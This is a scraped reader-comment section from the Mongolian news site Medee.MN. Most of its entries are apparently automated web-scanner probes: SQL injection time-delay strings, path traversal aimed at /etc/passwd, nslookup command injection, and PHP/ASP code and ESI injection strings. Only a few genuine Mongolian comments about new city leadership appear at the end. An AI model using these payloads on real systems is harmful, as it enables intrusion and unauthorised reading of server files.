GRLpGpAG [create] 2020-10-28 20:04:03

1

!(()&&!|*|*| [116.113.93.82] 2020-10-28 20:04:03

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:02

http://testasp.vulnweb.com/t/fit.txt?.jpg

GRLpGpAG [create] 2020-10-28 20:04:02

1

GRLpGpAG [testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 20:04:02

1

) [116.113.93.82] 2020-10-28 20:04:02

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:01

Http://testasp.vulnweb.com/t/fit.txt

'"() [116.113.93.82] 2020-10-28 20:04:01

1

GRLpGpAG [HttP://testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 20:04:01

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:00

^(#$!@#$)(()))******

GRLpGpAG [116.113.93.82] 2020-10-28 20:04:00

1some_inexistent_file_with_long_name.jpg

Array [116.113.93.82] 2020-10-28 20:04:00

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:03:59

!(()&&!|*|*|

GRLpGpAG [116.113.93.82] 2020-10-28 20:03:59

'"()

GRLpGpAG [116.113.93.82] 2020-10-28 20:03:58

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:03:58

)

GRLpGpAG [116.113.93.82] 2020-10-28 20:03:58

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

GRLpGpAG [${@print(md5(acunetix_wvs_security_test))}\] 2020-10-28 20:03:58

1

GRLpGpAG [WEB-INF\web.xml] 2020-10-28 20:03:58

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:03:58

Array

GRLpGpAG [${@print(md5(acunetix_wvs_security_test))}] 2020-10-28 20:03:57

1

GRLpGpAG [WEB-INF/web.xml] 2020-10-28 20:03:57

1

Array [116.113.93.82] 2020-10-28 20:03:56

1

GRLpGpAG&n941755=v981310 [116.113.93.82] 2020-10-28 20:03:56

1

GRLpGpAG [";print(md5(acunetix_wvs_security_test));$a="] 2020-10-28 20:03:56

1

GRLpGpAG [/WEB-INF/web.xml] 2020-10-28 20:03:55

1

Array [116.113.93.82] 2020-10-28 20:03:55

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:03:55

1

GRLpGpAG [';print(md5(acunetix_wvs_security_test));$a='] 2020-10-28 20:03:55

1

GRLpGpAG [/\../\../\../\../\../\../\../etc/passwd] 2020-10-28 20:03:55

1

GRLpGpAG ['"()] 2020-10-28 20:03:55

1

12345'"\'\");|]*{ <> [116.113.93.82] 2020-10-28 20:03:55

1

GRLpGpAG [^(#$!@#$)(()))******] 2020-10-28 20:03:55

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:03:55

1&n979507=v972825

GRLpGpAG [116.113.93.82] 2020-10-28 20:03:55

1

GRLpGpAG [;print(md5(acunetix_wvs_security_test));] 2020-10-28 20:03:54

1

GRLpGpAG [file:///etc/passwd] 2020-10-28 20:03:54

1

GRLpGpAG [Array] 2020-10-28 20:03:54

1

Зочин [116.113.93.82] 2020-10-28 20:03:54

1

GRLpGpAG [!(()&&!|*|*|] 2020-10-28 20:03:54

1

GRLpGpAG [sIiQ5Xn0'));select pg_sleep(6); -- ] 2020-10-28 20:03:54

1

GRLpGpAG [invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././] 2020-10-28 20:03:53

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:03:53

Array

GRLpGpAG [testasp.vulnweb.com] 2020-10-28 20:03:53

1

GRLpGpAG [)] 2020-10-28 20:03:53

1

GRLpGpAG [Fd0is63Z');select pg_sleep(3); -- ] 2020-10-28 20:03:53

1

GRLpGpAG [..] 2020-10-28 20:03:53

1

GRLpGpAG [116.113.93.82&n973315=v958465] 2020-10-28 20:03:52

1

GRLpGpAG [http://testasp.vulnweb.com/t/fit.txt?.82] 2020-10-28 20:03:52

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:03:52

Array

GRLpGpAG [bJ8LWm9p';select pg_sleep(3); -- ] 2020-10-28 20:03:52

1

GRLpGpAG [../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd] 2020-10-28 20:03:51

1

GRLpGpAG [Ml6he9h2'; waitfor delay '0:0:3' -- ] 2020-10-28 20:03:51

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:03:51

12345'"\'\");|]*{ <>

MkYyOFdEUWo= [116.113.93.82] 2020-10-28 20:03:51

1

GRLpGpAG [Http://testasp.vulnweb.com/t/fit.txt] 2020-10-28 20:03:51

1

GRLpGpAG [../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd] 2020-10-28 20:03:50

1

&nslookup kP5EyoMv&'\"`0&nslookup kP5EyoMv&`' [116.113.93.82] 2020-10-28 20:03:50

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:03:50

GRLpGpAG [1 waitfor delay '0:0:9' -- ] 2020-10-28 20:03:50

1

GRLpGpAG [1some_inexistent_file_with_long_name.82] 2020-10-28 20:03:50

1

GRLpGpAG [/.././.././.././.././.././.././.././../etc/./passwd%00] 2020-10-28 20:03:49

1

$(nslookup xT1hwJrA) [116.113.93.82] 2020-10-28 20:03:49

1

"+response.write(9851062*9042243)+" [116.113.93.82] 2020-10-28 20:03:49

1

GRLpGpAG [(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/] 2020-10-28 20:03:48

1

GRLpGpAG [http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.82] 2020-10-28 20:03:48

1

GRLpGpAG [%2fetc%2fpasswd] 2020-10-28 20:03:48

1

set|set&set [116.113.93.82] 2020-10-28 20:03:48

1

'+response.write(9851062*9042243)+' [116.113.93.82] 2020-10-28 20:03:48

1

GRLpGpAG [0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z] 2020-10-28 20:03:47

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:03:47

1

GRLpGpAG [/etc/passwd] 2020-10-28 20:03:47

1

${9999435+10000403} [116.113.93.82] 2020-10-28 20:03:47

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:03:47

&nslookup YBKgJ3t3&'\"`0&nslookup YBKgJ3t3&`'

response.write(9851062*9042243) [116.113.93.82] 2020-10-28 20:03:46

1

GRLpGpAG [0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z] 2020-10-28 20:03:46

1

GRLpGpAG<esi:include src="http://testasp.vulnweb.com/rpb.png"/> [116.113.93.82] 2020-10-28 20:03:46

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:03:46

${10000001+9999899}

GRLpGpAG [.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd] 2020-10-28 20:03:46

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:03:45

$(nslookup VoJvG0EN)

GRLpGpAG [116.113.93.82] 2020-10-28 20:03:45

"+response.write(9830112*9900821)+"

GRLpGpAG [if(now()=sysdate(),sleep(6),0)] 2020-10-28 20:03:45

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:03:45

1<esi:include src="http://testasp.vulnweb.com/rpb.png"/>

GRLpGpAG [/../..//../..//../..//../..//../..//etc/passwd.82] 2020-10-28 20:03:45

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:03:45

set|set&set

GRLpGpAG [Array] 2020-10-28 20:03:45

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:03:45

'+response.write(9830112*9900821)+'

GRLpGpAG [-1" OR 2+231-231-1=0+0+0+1 -- ] 2020-10-28 20:03:45

1

GRLpGpAG [${9999891+10000229}] 2020-10-28 20:03:44

1

GRLpGpAG [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.82] 2020-10-28 20:03:44

1

GRLpGpAG [Array] 2020-10-28 20:03:44

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:03:44

response.write(9830112*9900821)

GRLpGpAG [-1' OR 2+573-573-1=0+0+0+1 or 'PZjDdb6I'='] 2020-10-28 20:03:44

1

GRLpGpAG [116.113.93.82<esi:include src="http://testasp.vulnweb.com/rpb.png"/>] 2020-10-28 20:03:44

1

GRLpGpAG [../../../../../../../../../../etc/passwd.82] 2020-10-28 20:03:44

1

GRLpGpAG [12345'"\'\");|]*{ <>] 2020-10-28 20:03:43

1

GRLpGpAG [-1' OR 2+853-853-1=0+0+0+1 -- ] 2020-10-28 20:03:43

1

fKRlQ8MQ [116.113.93.82] 2020-10-28 20:03:43

1

GRLpGpAG [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd] 2020-10-28 20:03:43

1

GRLpGpAG [] 2020-10-28 20:03:42

1

GRLpGpAG [-1 OR 2+598-598-1=0+0+0+1] 2020-10-28 20:03:42

1

GRLpGpAG [../../../../../../../../../../../../../../../proc/version] 2020-10-28 20:03:41

1

GRLpGpAG [&nslookup IdKGCCAI&'\"`0&nslookup IdKGCCAI&`'] 2020-10-28 20:03:41

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:03:41

IQragFfJ

GRLpGpAG [-1 OR 2+715-715-1=0+0+0+1 -- ] 2020-10-28 20:03:41

1

GRLpGpAG [../../../../../../../../../../etc/passwd] 2020-10-28 20:03:40

1

GRLpGpAG [$(nslookup kNDH4U0j)] 2020-10-28 20:03:40

1

GRLpGpAG [HG0BsJv9] 2020-10-28 20:03:40

1

GRLpGpAG ["+response.write(9793153*9865107)+"] 2020-10-28 20:03:40

1

GRLpGpAG [bU48VsyD] 2020-10-28 20:03:39

1

GRLpGpAG [set|set&set] 2020-10-28 20:03:39

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:03:39

1

GRLpGpAG ['+response.write(9793153*9865107)+'] 2020-10-28 20:03:39

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:03:38

1

GRLpGpAG [response.write(9793153*9865107)] 2020-10-28 20:03:38

1

GRLpGpAG [116.113.93.82] 2020-10-28 19:55:14

1

ЗОЧИН [202.126.89.115] 2020-10-28 02:30:03

СУМЪЯАБУЗАР ОРЛОГЧ НАРААРАА АЖИЛ ХИЙЛГЭЭД ӨӨРӨӨ ИДЭХ АЖИЛДАА ХАНЦУЙ ШАМЛАН ОРОВ ОО ГЭЖ

Амжилт хүсье! Улаанбаатарчуудаас. [202.131.225.53] 2020-10-28 01:22:11

Шинэ удирдлагадаа ажлын өндөр амжилт хүсьедээ. Ажлаа хийж цалингаа авахын хирээр улаанбаатарчууддаа хэрэгтэй зүйл ихийг хийгээрэй. Аймгууд нийслэлтэйгээ их юм булаацалдна, өрсөхийг оролдно. Тэдний хойно л орж болдоггүй юм шүү. Орчин үеийн төр иргэд дээрээ тогтдог, иргэдийн дийлэнх нь Улаанбаатарт л оршиж амьдарч байна. Амжилт!

Зочин [202.126.88.202] 2020-10-27 09:49:55

Боов сүхээ муухай амбицтай гар юмаа багаар ажилна гэдэгийг мэддэгүй гар байнлээ


1008 сэтгэгдэл байна
1000 тэмдэгт оруулах үлдлээ.
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.
1008 сэтгэгдэл байна
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.